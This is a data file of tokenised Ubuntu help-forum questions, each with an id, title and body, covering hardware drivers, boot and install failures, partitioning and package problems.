416781	laptop sdcard reader not recognised ( dell inspiron 15 7000 )	i have this laptop http : //www.dell.com/uk/p/inspiron-15-7537/pd and the sdcard reader does not seem to work at all under ubuntu . i have tested it with windows and it works just fine however when using ubuntu if i insert a sdcard nothing is detected . 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation device 0a0c ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) 00:1c.2 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1c.4 pci bridge : intel corporation lynx point-lp pci express root port 5 ( rev e4 ) 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 02:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5287 ( rev 01 ) 03:00.1 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 12 ) 04:00.0 3d controller : nvidia corporation gk107m [ geforce gt 750m ] ( rev a1 )
416785	installation problem on virtualbox	i downloaded ubuntu-12.04.3-desktop-amd64 and when i tried to install it on virtualbox the following message is displayed terminating the installation . this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot- please use a kernel appropriate for your cpu . please help me with this ...
416787	file manager opens twice in xubuntu 12.04	every time i click on the file manager folder and after it opens i notice a couple seconds later a second file manager window opens . any suggestions ? -mo
416793	how to log out/log in remotely for a user login locally to the gui ?	i am using ligtdgm as the local login tool . sometimes need to kick a user off or login another user to have access to video card .
416794	ca n't install the ubuntu sdk due to broken qtcreator-plugin-ubuntu dependency	i tried to install the ubuntu sdk on my ubuntu 13.10 virtual machine ( vmwareplayer ) by typing sudo add-apt-repository ppa : ubuntu-sdk-team/ppa & & sudo apt-get update & & sudo apt-get install ubuntu-sdk in the terminal . the process gets stuck at a point and is unable to go further so terminates . the final window of the terminal says the following : ign http : //us.archive.ubuntu.com saucy-backports/restricted translation-en_us ign http : //us.archive.ubuntu.com saucy-backports/universe translation-en_us fetched 1,190 kb in 51s ( 22.9 kb/s ) reading package lists ... done reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntu-sdk : depends : qtcreator-plugin-ubuntu but it is not going to be installed e : unable to correct problems , you have held broken packages . mrwhite @ ubuntu : ~ $ what do i do ?
416795	mouse cant right click/ left click	i have windows 8.1 + ubuntu 13.10 installed . it is my first time trying ubuntu . so when i log in , after a few seconds , mouse does not respond when i click on a tab or anywhere else , but when i click inside firefox it works fine . also i can not click anything on the left menu bar . tried installing additional drivers but does not work . mouse is cyborg r.a.t 3 . please help .
416798	flashplugin download error	i casually checked for updates on software updater and there were some , and i updated them . after that flashplugin is not working . i tried sudo apt-get remove flashplugin-installer . and i got this : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : flashplugin-installer 0 upgraded , 0 newly installed , 1 to remove and 4 not upgraded . after this operation , 139 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 204417 files and directories currently installed . ) removing flashplugin-installer ... processing triggers for update-notifier-common ... ..and it stopped . and then i gave sudo apt-get install flashplugin installer , it said so : chinmaya @ chinmaya-hp-pavilion-dv6-notebook-pc : ~ $ sudo apt-get install flashplugin-installer reading package lists ... done building dependency tree reading state information ... done suggested packages : x-ttcidfont-conf ttf-bitstream-vera ttf-dejavu ttf-xfree86-nonfree xfs the following new packages will be installed : flashplugin-installer 0 upgraded , 1 newly installed , 0 to remove and 4 not upgraded . need to get 0 b/7,008 b of archives . after this operation , 139 kb of additional disk space will be used . preconfiguring packages ... selecting previously unselected package flashplugin-installer . ( reading database ... 204398 files and directories currently installed . ) unpacking flashplugin-installer ( from ... /flashplugin-installer_11.2.202.336ubuntu0.13.10.1_amd64.deb ) ... processing triggers for update-notifier-common ... flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.336.orig.tar.gz traceback ( most recent call last ) : file `` /usr/lib/update-notifier/package-data-downloader '' , line 234 , in process_download_requests dest_file = urllib.urlretrieve ( files [ i ] ) [ 0 ] file `` /usr/lib/python2.7/urllib.py '' , line 94 , in urlretrieve return _urlopener.retrieve ( url , filename , reporthook , data ) file `` /usr/lib/python2.7/urllib.py '' , line 240 , in retrieve fp = self.open ( url , data ) file `` /usr/lib/python2.7/urllib.py '' , line 208 , in open return getattr ( self , name ) ( url ) file `` /usr/lib/python2.7/urllib.py '' , line 345 , in open_http h.endheaders ( data ) file `` /usr/lib/python2.7/httplib.py '' , line 969 , in endheaders self._send_output ( message_body ) file `` /usr/lib/python2.7/httplib.py '' , line 829 , in _send_output self.send ( msg ) file `` /usr/lib/python2.7/httplib.py '' , line 791 , in send self.connect ( ) file `` /usr/lib/python2.7/httplib.py '' , line 772 , in connect self.timeout , self.source_address ) file `` /usr/lib/python2.7/socket.py '' , line 553 , in create_connection for res in getaddrinfo ( host , port , 0 , sock_stream ) : ioerror : [ errno socket error ] [ errno -2 ] name or service not known setting up flashplugin-installer ( 11.2.202.336ubuntu0.13.10.1 ) ... what should i do to repair this ?
416799	creating an ubuntu partition on a macbookpro 9,1	i have a macbookpro 9,1 and i 'd like to create a bootable ubuntu partition ( virtual machines are too hardware-limited ) ; however , the mactel support matrix does n't list anything for my model . which of the following scenarios fits me the best ? it is not possible for my model there is no specific guidance for my model ( i can follow the general instructions for any model ) no guide has been written for my model ( i 'm on my own ) other ( please elaborate )
416800	questions about behaviour of running livecd after unmounting a cd-rom	could anyone explain what happens in system after unplugging cd-rom during working with livecd session ? suppose that i 'm using ubuntu livecd and suddenly by accident the cd-rom disconnect for a matter of second because of for example power outage in the case of external devices or just opening the cd tray if the os allows to do it . assume that after a while the cd-rom is pluged in again . can anyone explain what exactly happens then , why the os stops or rather is working but not as before it and how , if it 's possible , the stability and usefullness can be brought back and user can continue working with ? according to my observations based on ubuntu livecds ( versions under 12 , the kernel version is probably 2.6.xx ) the system reaction is like following : all applications in x desktop disappear ( i think it 's due to automatic sending a kill signal to all processes as if the os wanted to shut down but actually it seems to wait for something ) and it looks like only the background image with the cursor which can be moved all the time all ttys are avaible and can be displayed but there are only error messages there like info : task < process name > : < pid > blocked for more than 120 seconds and squashfs error : unable to read [ ... ] all the time i can see blinking '_ ' and i can type something but pressing enter just make it skipped to the new line and obviously the os does n't execute it terminal 's shortcuts for canceling and quit current process also do n't work magic sysrq combinations are generally working and i can see the actual output but i do n't know which of them would be useful in this case can anyone explain this reaction and tell what exactly these errors mean ? and what can one do then to fix it - is there any way for that and why not , if so ? here : http : //unix.stackexchange.com/questions/76166/what-does-info-task-xxx-blocked-for-more-than-120-seconds-exactly-mean-on-lin i 've just read that `` if a task is blocked , it waits for resources to become available again '' . so if i got it correctly it 's waiting for resources - is it true or just wrong interpretation and it will wait endlessly - cd-rom is surely pluged in again as fast as possible . how to understand it ? i know that processes are gone ( or `` blocked '' as error messages are suggesting ? ) , but how about files in the ramdisk , are they still there untill reboot ? is this possible to access them somehow ? or for example just extract text strings and so on ? there is a magic sysrq shourtcut which remount filesystems - are there any chances that it would help in such situations or should be tried eventually at the end after other trials ? if the cd are working as virtual fs , what effects can bring remountig filesystems in that case ?
416803	wireless connects to network but no internet - edimax ew-7612 pin	i have an edimax ew-7612pin wireless card . booted up my computer ( 13.10 ) with it inserted , and i was able to connect to my wifi without issue . however , i am unable to access internet sites . does anyone know what might be the issue ? edited with console commands : lspci -nn | grep 0280 : : ~ $ lspci -nn | grep 0280 06:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8191sevb wireless lan controller [ 10ec:8172 ] ( rev 10 ) and nm-tool : networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : sky2 state : unavailable default : no hw address : 20 : cf:30 : e2:90:89 capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : off - device : wlan0 [ hitron-dc50 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : rtl8192se state : connected default : yes hw address : 00:1f:1f : fa:70:26 capabilities : speed : 150 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *hitron-dc50 : infra , 78:8d : f7 : be : dc:58 , freq 2437 mhz , rate 54 mb/s , strength 60 wpa wpa2 ipv4 settings : address : 192.168.0.13 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 ping results : ping 192.168.0.1 ( 192.168.0.1 ) 56 ( 84 ) bytes of data . -- - 192.168.0.1 ping statistics -- - 3 packets transmitted , 0 received , 100 % packet loss , time 2014ms and ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 3 packets transmitted , 0 received , 100 % packet loss , time iwconfig this is a potentially relevant question but i have a different rtl ... . so i am reluctant to go ahead on that
416804	false display settings	hy , i already use ubuntu since 13.04 came out , but i do not know since when i have this anoing bug , which shows me that i would have two displays , but i only have one . this appears on gnome kde and xfce , so i just disabled it in gnome , and need to manually disable it in kde on every reboot . recently , i changed back to my xfce de , where this screen is also disabled , but everytime i want to have multiple virtual desktops , this second `` screen '' apperas grayed out ... so , my question is : how can i `` delete '' or `` unmount '' this screen , once and for ever , because this screen does not exist ? ( sry , but the picture is made from a german laptop , so you may do not understand the words ... ) !
416807	driver xerox workcentre 7530 ubuntu 13.10 no color	i trying to install a network printer xerox workcentre 7530 on my ubuntu 13.10 fresh installation . no offical driver from xerox , so i had to install openprinting driver from http : //www.openprinting.org/driver/postscript-xerox . unfortunately among many xerox workcentre printer there is no 7530 model . i had to swhitch to the recomended one 7345 , but there are two important failures : only b/n printing ( no color ) fail to select paper drawers . any advice to overcome that problem ? thanks a lot .
416815	primus not working	i used to have primus working on my laptop , then a friend of mine decided that having nvidia-primus is better , so we tried it but it did n't work for me . however i tried to get back to primus , but now i have optimus running ok , and when i run primusrun glxgears i get this : segmentation fault ( core dumped ) reinstalled bumblebee , primus , nvidia drivers , etc. , primus not working yet .
416819	ubuntu wont boot and freezes at purple screen after updating build-essential	i 'm working on my final year project and the ns2.34 simulator only works on ubuntu . what happens is , when i 'm installing ns2.34 i need to update build-essential with other libraries . i think xgraph is one of those libraries . everything goes ok . i install ns-2.34 and everything seems ok , even though i did n't try to use it yet . but when i restart my computer , ubuntu 12.04 freezes at the purple screen ! i tried ctrl + alt + f1 , i could get access to the terminal and i i am able to log in . but how can i get passed the purple screen and boot into the graphical interface ?
416821	frozen after pressing restart to complete upgrade	i use the dual boot ( ubuntu & windows 7 ) , after completing upgrade from ubuntu 12.04 to 12.10 i pressed the 'restart ' to complete updates , but until now nothing happened , the home screen is empty and frozen , it did n't boot .
416825	how to quick switch between desktop environments in the running desktop session ?	is there a way to quick switch ( preferably from command line ) between one desktop environment to other ; say , from unity to classical gnome without having to close any of the running applications in the same desktop session ? ( please note that it 's not about installing the environments . )
416826	how can i tell when a repository mirror is down ?	it appears that my local repository mirror for ubuntu saucy salamander packages was down overnight . is there a status page , or other source i can query to find out when there was a service outage with the ubuntu archives and mirrors ?
416827	glusterfs 3.5 -- add repository	i 'm trying to install the latest version of glusterfs ( 3.5 ) . i have ubuntu 13.04 . i have added the repository , updated and installed gluster-server , but it does n't work . when i see the version is still the default version . does anyone have the same problem ? i do n't know what else do . i have installed the version 3.4.2 and it has been succesful ... does anyone install glusterfs 3.5 ? thanks in advanced !
416828	how to run llanfair on ubuntu ?	now , to define , llanfair is a stopwatch esque program , used by speed runners , which is found here . the program is available as a windows download , as well as a .jar file for use on all other operating systems . i went ahead and installed jdk java runtime 7 from the software centre , set the executable permissions in the properties for the file , set it to launch with java , but when i double-click the program , nothing opens . im running 13.10 , and i just really want to know what exactly the issue could be .
416829	no default or ui configuration directive found ( i know this is a duplicate hang on ... . )	i followed instructions for making usb lubuntu installation thumb drive from their site formatted usb drive on fat format ( also tried with fat32 format ) boot from thumb drive got error no default or ui configuration directive found try reformatting thumb drive as fat instead of fat32 - no change try fat32 again , and rename folders and files as indicated ( isolinux < -- > syslinux ) folder name in root of thumb drive , cfg file , and one other file mentioned in comments in other question comments ) and slightly different error seen on boot - ca n't find syslinux/syslinux.cfg or similar the question i tried following before creating this one : boot failure : no default or ui configuration directive found ! i am able to install other os 's on the system - they were either too slow or no wifi support . i want to try lubuntu to revive this old laptop with wifi support . any further suggestions ? thanks for understanding - i am day 1 trying to be a new user : )
416830	how to delete windows xp and integrate its partition to ubuntu ?	i currently have my machine partitioned with windows 7 & xp ; and since xp will soon no longer be officially supported i want to replace that partition with ubuntu . however i also already have an ubuntu os running on the same drive , is there a way to integrate the xp partition to already installed ubuntu system ? or do i need to do a clean install ?
416832	installing windows 8 on ubuntu 12.10 with windows 8 already installed	i do n't know that if it sounds confusing but what i want to do is that install windows 8 along with ubuntu 12.10 ( already installed ) . i have windows 8 previously installed as well and i want to overwrite it . is it possible to do so ? how can i do this without using a usb or a dvd ?
416834	properly piping 'find ' with multiple outputs	i recently decided i 'd like to spend less time using the gui of the mkvtoolnix package , and put some research into batching my work with mkvmerge . it became apparent quite quickly that i 'd probably want to pipe the output of something like find -mindepth 2 -type f -name `` *.mkv '' -print0 into mkvmerge ( i understand xargs is supposed to be a superior method of doing this to find 's own -exec , though not at all why that is ) , except that i 'd like to handle my output file a little more complexly ( and mkvmerge ca n't overwrite the source file , anyhow ) , so some manipulation of the { } argument should take place . i began considering that perhaps creating a script which can declare variables and manipulate them is the proper way to go . as i 'm sure you see , i do n't really know what i 'm doing here , and i do n't think i almost have it in my grasp either . so ... i was wondering if someone could point me in the direction of some reasonably scoped tutorials for understanding how piping works and/or how to create basic scripts that can achieve my current goals ( assigning a program 's output to variables , manage variables , extracting path/basename from relative-path , manipulating strings etc. ) . i 'll appreciate sources somewhat more extensive than strictly required for what i 've described , but i 'd like nothing too rudimentary or too complicated for my current level , if at all possible . any tip immediately applicable to my current quest will also be much appreciated , although my goal here is to be able to do things like this on my own , so please include some explanation of how and why any particular example works .
416835	cairo dock wo n't be launched at start	when i log in my system , there is a delay of about 10-15 seconds ( black screen with cursor on it ) and i do n't know if that is normal . then cairo-dock wo n't show up . the startup applications menu have a entry with the following information : sleep 5 & & cairo-dock -o the sleep 5 commando is in order to have the restart and shutdown buttons within the unity panel working ( otherwise they wo n't work ) .
416836	what is the easiest way to create a meta upstart script	i want to have a `` meta '' upstart service that start/stops several other upstart services . what is the easiest way to do this ?
416837	install ubuntu but keep local disk d and its content	i want to install ubuntu and remove windows 7 . i choosed replace windows 7 with ubuntu option . now it shows me which hdd disk to use and says that 3 partitions willbe deleted . but i need to install ubuntu to local disk c and keep other local disk d and keep its content . what can i do ? thanks !
416839	how to merge free space into partion in ubuntu server ?	i 'm running ubuntu server as a virtual machine with virtualbox in windows . because i 've ran out of space i resized the virtual machine size from 6 gb to 8 gb . but those 2 gb appear as `` free space '' inside the ubuntu os . i suspect i have to use `` parted '' to reallocate the `` free space '' . typing parted , then help , shows a list of commands . i want to list all partitions first so i type print free : ( parted ) print free model : ata vbox harddisk ( scsi ) disk /dev/sda : 8590mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 32.3kb 1049kb 1016kb free space 1 1049kb 5638mb 5637mb primary ext4 boot 5638mb 5639mb 1048kb free space 2 5639mb 6441mb 802mb extended 5 5639mb 6441mb 802mb logical linux-swap ( v1 ) 6441mb 8590mb 2149mb free space so i want to append all free space to number 1 . how would i do that ? i 'm clueless : (
416842	lenovo g510 with 12.04 lts issues	i have a few problems with my recently purchased notebook lenovo g510 and as a beginner i do not know how to solve those problems . to the point : my amd radeon graphic is not worknig at all and the brightness buttons do not function as well - there are some tutorial to help but i was unsuccessful . thank you guys for your help . boot_image=/boot/vmlinuz-3.2.0-58-generic root=uuid=ad62cbb7-c145-417a-9b3f-bb7250fbb0a9 ro splash quiet vt.handoff=7 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) subsystem : lenovo device 3801
416844	how do you redirect the output of lynx to print only the last 20 lines of its output ?	i need help figuring out a command that will make lynx print out only the last 20 lines of the output i have for it . i just learned lynx -dump and i was attempting to use it with a pipeline with the command tail : lynx -dump names1990s.html | tail -20 name1990s.html i 'm not sure if i am using a pipeline correctly . we just learned how to pipeline .
416846	cant install ubuntu	hey ppl i have downloaded ubuntu desktop 32 bits version via bittorrent and have created a bootable usb stick but i am unable to install ubuntu via the usb stick whenever i boot up with my usb a maroonish kind of scren appers with the ubuntu logo and dots turning red to white and when i press esc then it shoes can not find bootable media plz help i have followed all the steps in making my usb drive bootable
416851	missing wubildr.mbr	i installed ubuntu on windows and made a special partition for ubuntu so it works perfectly , after the download and installation was finished i restarted my computer and after reboot it said there 's wubildr.mbr missing . i went to the file and saw there is the file but in reboot cant find it it shows : file : \ubuntu\winboot\wubildr.mbr status : 0xc0000098 info : the selected entry could not be loaded because the application is missing or corrupt so what should i do now ? i really wan na work on ubuntu plz help
416854	screen problem after wake up from standby	if i put my laptop ( asus satellite m60 - 162 ) in standby when i wake it up the screen is strange , as you can see in the picture . how can i solve ? https : //dl.dropboxusercontent.com/u/43867401/photo % 2005-02-14 % 2007 % 2009 % 2035 % 20pm.jpg
416856	hosts file changes not showing their effect , other options ?	hosts file changes not showing their effect . i need to add a domain name alias to my localhost address so that when i type `` myfictiousdomainname.com '' it should request localhost:8084 address on my computer . but i made all attempts to make the hosts file work but it does n't . now i need the kind of thing like i use fiddler2 in windows7/8 to set this domain name alias . is there anything alike for ubuntu 12.04 or how could i otherwise setup this domain alias for a localhost address ?
416861	permission denied to create files in particular directory under home directory	i copied a folder recursively from the /www/ directory to one of my directories under my home directory . now , every time i want to create a file or a folder in this copied directory , it says permission denied . so , i have to use sudo every time . the problem is that i can create files/folders in other directories under the home directory , except this one . i tried changing the permission of this directory recursively to 755 but still the same problem . can anyone point out what the exact problem i am facing is ? and how do i get around this ?
416862	how to have a different virtual desktop per physical display ?	context : i 've recently switched back to using an external monitor with my laptop . i 'm using a 2x2 virtual desktop with the expo plugin . ( actually a 3x3 , does n't matter ) i 'm currently not satisfied with the associated workflow . what it currently looks like : as you can see there are 2x2 virtual desktops , each virtual desktop being a wall of the different physical displays . what it could look like : the picture is extracted from the video of a 2011 design mockup , the obvious difference being that there is one different virtual desktop per physical display . i had no problem to keep track of where wy windows are using only one screen but it 's suddenly more difficult to manage with a second screen . ( not to mention that plugging it moves my windows arounds the different virtual desktops ... ) what happened to the mockup ? how do i get different virtual desktops per physical display as showed in the mockup ? is it even currently possible ? can i code it ?
416863	lubuntu taskbar width - little problem with workspace switcher applet	i 've installed lubuntu and really like it , i want to make it my main os . but i have a little hiccup setting it up . on mint , i 'd normally put the workspace switcher applet in a corner of the taskbar . if i wanted to switch workplaces ( i do it a lot ) , i 'd just drag the cursor ( without looking ) to the corner and use the mouse wheel to switch . very convenient and became automatic with me . the problem in lubuntu is that there is like a pixel or two of the taskbar remaining around the applet icon , so the cursor hits this little inactive area instead of hitting the applet . i increased the size of applet buttons , it helped to eliminate the vertical margin , but there is still inactive space to the right and left of the applet - yellow area on the pic : any suggestions how i can fix it ? btw , the menu applet icon does not have this margin , so something must be possible . thanks in advance !
416864	how to allocate disk space from one filesystem to another ?	i have ubuntu 12.04 on dedicated server with 2 tb hard disk , while running a daemon i got error running low on disk space , when i check memory status by running df -h it shows that my rootfs have 20 gb disk space and i almost ran out of it however i have rest free disk space in /dev/md3 is there any command i can allocate more disk space to /dev/root ? this is the output of df -h filesystem size used avail use % mounted on rootfs 20g 18g 170m 100 % / /dev/root 20g 18g 170m 100 % / devtmpfs 16g 4.0k 16g 1 % /dev none 3.2g 260k 3.2g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 16g 0 16g 0 % /run/shm /dev/md3 1.8t 118m 1.7t 1 % /home
416866	how can i get the `bcmath` plugin in php5 in ubuntu ?	i 've seen a php bc-math installation for yum but not apt-get . does one know of a working apt-get solution ? unfortunately , from this so thread , apt-get install php5-bcmath gives the error unable to locate package php5-bcmath .
416872	how fix broken kde ?	after i updated my nvidia-319 to nvidia-331 kde got broken . taskbar became black and minimize and maximize does n't work . even konsole does n't work . i reinstalled nvidia but nothin has changed . how can i fix it ?
416877	ubuntu touch ( nexus 4 ) launcher not displaying app name	i installed ubuntu on my nexus 4 , when i hover finger on any icon on launch pad it does not display app name .
416881	how to get x11 running again after crash	my ubuntu 12.04 system hung . i had to force power it off . it now boots only into console mode . on booting , i catch a glimpse of `` can not write bytes '' , but there is nothing in the boot log . i have tried booting recovery mode from grub , and when i run graphics in failsafe mode , i 'm getting a screen ( s ) found , but none have a usable configuration . i have read this post , and applied the instructions , but i still do n't boot into the desktop . i have looked in syslog and can not find an obvious culprit . unity -- reset fails indicating a bunch of errors , including d-bus not running and `` did i just try to reset in a tty '' . i like to think i can diagnose a lot of linux problems , so i am asking more for things to check than necessarily an answer to fix this , but an answer would also be helpful . here is the log requested in the comment : [ 17.224 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 17.224 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 17.224 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 17.224 ] ( ** ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 17.224 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 17.224 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 17.224 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 17.224 ] ( ** ) nvidia ( 0 ) : option `` twinviewxineramainfoorder '' `` crt-0 '' [ 17.224 ] ( ** ) nvidia ( 0 ) : option `` metamodes '' `` 1280x1024 +0+0 ; 1280x960 +0+0 '' [ 17.224 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 17.225 ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia kernel module . please see the [ 17.225 ] ( ee ) nvidia ( 0 ) : system 's kernel log for additional error messages and [ 17.225 ] ( ee ) nvidia ( 0 ) : consult the nvidia readme for details . [ 17.225 ] ( ee ) nvidia ( 0 ) : *** aborting *** [ 17.225 ] ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 [ 17.225 ] ( ii ) unloadmodule : `` nvidia '' [ 17.225 ] ( ii ) unloading nvidia [ 17.225 ] ( ii ) unloadmodule : `` wfb '' [ 17.225 ] ( ii ) unloading wfb [ 17.225 ] ( ii ) unloadmodule : `` fb '' [ 17.225 ] ( ii ) unloading fb [ 17.225 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 17.225 ] fatal server error : [ 17.225 ] no screens found [ 17.225 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 17.226 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 17.226 ] [ 17.226 ] ddxsiggiveup : closing log [ 17.226 ] server terminated with error ( 1 ) . closing log file . after resetting the x11 config file , rebooting , and running gksudo nvidia-settings , i get an error ( gksudo:1993 ) : gtk-warning ** : can not open display :
416882	instability of wired qualcomm atheros ar8161 ethernet connection with kernel update 3.2.0-58	i 've been running 12.04 and compiling up compat-wireless-2012-03-12-p.tar.bz2 ( i found this page covering asus n56v / ubuntu 12.04 issues which linked to orbit lab ) each time i get a kernel upgrade . i accepted an upgrade to 3.2.0-58 a few days ago , and performed my recompile and install as usual but ever since then the ethernet connection has been dropping , and my machine has hung completely several times . i then went to the alx linux foundation page and downloaded the latest compat-drivers-2013-03-04-u.tar.bz2 file , but this would n't compile . finally i looked at how do i install drivers for the atheros ar8161 ethernet controller ? , and i installed the official 3.4 backports package sudo modprobe -r alx sudo apt-get install linux-backports-modules-cw-3.4-precise-generic which i understand to be the latest supported version which will automatically update with new kernel updates . ( i 'm not really sure whether it 's being used or my old driver is being used . ) however the wired dropouts continued , as did the machine hangs . so then i used grub to boot with 3.2.0-57 and everything seems fine again ( i 'm not sure whether this kernel is still using the drivers i compiled myself or is using the 3.4 backports package ) . i 'd like some advice if possible as to how to proceed . have i done something wrong and i ought to be able to use the latest kernel somehow ? to be honest i 'm not an expert here and have just searched the web and found something that worked last year and stuck with that , and perhaps that 's the wrong approach . or is this something where i ought to just wait it out , decline further kernel updates , and then upgrade my distribution to 14.04 where all this should have been sorted out ?
416885	gui loss on personal computer	was attempting the remote login option ( which failed ) . then i logged into my main account to seek online help , i logged in and i had no side bar with icons on it , or a top menu bar either . my personal desktop computer running 13.04 had effectively turned into a server with minimal gui . please help me try and find a solution .
416886	does the mpt2sas driver support trim ?	i 'm running ubuntu 13.10 with an lsi 9211-8i sas adapter with samsung 840 evo ssds . doing some performance testing i noticed the write speed dropping off significantly so i 've been attempting to get trim working with this adapter . the ssds support trim : # hdparm -i /dev/sdc | grep `` trim supported '' * data set management trim supported ( limit 8 blocks ) if i move the ssds to another system with a different controller , run fstrim and move them back to this system the expected performance is restored . according to lsi their initiator-target ( it ) firmwares support trim . however trim support is not working : # cat /sys/block/sdc/queue/discard_granularity 0 # fstrim /srv/node/disk2p1 fstrim : /srv/node/disk2p1 : fitrim ioctl failed : operation not supported i am not using lvm or crypto for these file systems . i 've tried both xfs and ufs4 formats , although i am planning on using xfs . here is an example fstab line : label=disk2p1 /srv/node/disk2p1 xfs noatime , nodiratime , nobarrier , logbufs=8 , discard 0 0 for the controller firmware i 've tried lsi 's p14 , p16 and p18 ( latest ) firmwares . i 've also built the lsi provided mpt2sas driver p18 which required a minor patch to remove __devexit but otherwise compiled and runs okay . i also tried a daily snapshot build of trusty using the stock mpt2sas driver . here are the mpt2sas dmesg lines with the time removed : mpt2sas version 18.00.00.00 loaded mpt2sas0 : 64 bit pci bus dma addressing supported , total mem ( 16418600 kb ) mpt2sas0 : _base_get_ioc_facts : ioc_state ( 0x22000000 ) sd 3:0:0:0 : [ sda ] 7815168 512-byte logical blocks : ( 4.00 gb/3.72 gib ) sd 3:0:0:0 : [ sda ] write protect is off sd 3:0:0:0 : [ sda ] mode sense : 43 00 00 00 sd 3:0:0:0 : [ sda ] no caching mode page found sd 3:0:0:0 : [ sda ] assuming drive cache : write through sd 3:0:0:0 : [ sda ] no caching mode page found sd 3:0:0:0 : [ sda ] assuming drive cache : write through sda : sda1 sd 3:0:0:0 : [ sda ] no caching mode page found sd 3:0:0:0 : [ sda ] assuming drive cache : write through sd 3:0:0:0 : [ sda ] attached scsi removable disk mpt2sas0 : _base_get_ioc_facts : failed going to ready state ( ioc_state=0x20000000 ) mpt2sas0 : msi-x vectors supported : 1 , no of cores : 16 , max_msix_vectors : -1 mpt2sas 0000:04:00.0 : irq 79 for msi/msi-x mpt2sas0-msix0 : pci-msi-x enabled : irq 79 mpt2sas0 : iomem ( 0x00000000df2b0000 ) , mapped ( 0xffffc90011c80000 ) , size ( 65536 ) mpt2sas0 : ioport ( 0x000000000000fc00 ) , size ( 256 ) mpt2sas0 : _base_get_ioc_facts : ioc_state ( 0x22000000 ) mpt2sas0 : _base_get_ioc_facts : failed going to ready state ( ioc_state=0x20000000 ) mpt2sas0 : sending message unit reset ! ! mpt2sas0 : message unit reset : success mpt2sas0 : allocated physical memory : size ( 7445 kb ) mpt2sas0 : current controller queue depth ( 3307 ) , max controller queue depth ( 3432 ) mpt2sas0 : scatter gather elements per io ( 128 ) mpt2sas0 : overriding nvdata eedptagmode setting mpt2sas0 : lsisas2008 : fwversion ( 18.00.00.00 ) , chiprevision ( 0x03 ) , biosversion ( 07.35.00.00 ) mpt2sas0 : dell 6gbps sas hba : vendor ( 0x1000 ) , device ( 0x0072 ) , ssvid ( 0x1028 ) , ssdid ( 0x1f1c ) mpt2sas0 : protocol= ( initiator , target ) , capabilities= ( tlr , eedp , snapshot buffer , diag trace buffer , task set full , ncq ) mpt2sas0 : sending port enable ! ! mpt2sas0 : host_add : handle ( 0x0001 ) , sas_addr ( 0x590b11c027281600 ) , phys ( 8 ) mpt2sas0 : port enable : success sd 2:0:1:0 : [ sdc ] 976773168 512-byte logical blocks : ( 500 gb/465 gib ) sd 2:0:0:0 : [ sdb ] 143374000 512-byte logical blocks : ( 73.4 gb/68.3 gib ) sd 2:0:2:0 : [ sdd ] 976773168 512-byte logical blocks : ( 500 gb/465 gib ) sd 2:0:3:0 : [ sde ] 976773168 512-byte logical blocks : ( 500 gb/465 gib ) sd 2:0:4:0 : [ sdf ] 976773168 512-byte logical blocks : ( 500 gb/465 gib ) sd 2:0:0:0 : [ sdb ] write protect is off sd 2:0:0:0 : [ sdb ] mode sense : d7 00 00 08 sd 2:0:5:0 : [ sdg ] 976773168 512-byte logical blocks : ( 500 gb/465 gib ) sd 2:0:0:0 : [ sdb ] write cache : disabled , read cache : enabled , does n't support dpo or fua sd 2:0:1:0 : [ sdc ] write protect is off sd 2:0:1:0 : [ sdc ] mode sense 